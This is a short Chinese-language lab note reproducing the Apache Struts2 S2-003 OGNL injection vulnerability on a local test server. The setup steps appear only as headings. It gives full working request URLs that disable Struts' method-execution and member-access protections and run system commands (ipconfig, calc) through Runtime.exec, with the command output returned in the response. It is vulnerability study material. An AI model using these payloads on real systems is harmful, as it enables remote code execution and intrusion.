Struts2 S2-003

Struts2 S2-003影响的版本是低于2.0.12以下的，所以搭建的环境使用低于2.0.12的最近一次版本，2.0.11.2。

环境搭建：
1.项目结构：



2.pom.xml里的配置：



3.web.xml的配置：



4.struts.xml的配置 ：



5.LoginAction.java代码：



6.index.jsp的代码：



7.welcome.jsp的代码：



注意，tomcat-7.0.78本身限定了特殊字符;要验证此漏洞，需要使用tomcat6.0。
相关说明：



简单验证一下，在index.jsp加入如下代码：



默认情况下的展示如下：



访问如下url: http://localhost:8080/LoginAction.action?('\u0023session[\'user\']')(unused)=0wn3d 则展示如下：



下面开始想一些高危的利用方法，比如执行一些命令。
如下为打印ipconfig: http://localhost:8080/LoginAction.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023mycmd\u003d\'ipconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))
打开计算器: http://localhost:8080/LoginAction.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023mycmd\u003d\'calc\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)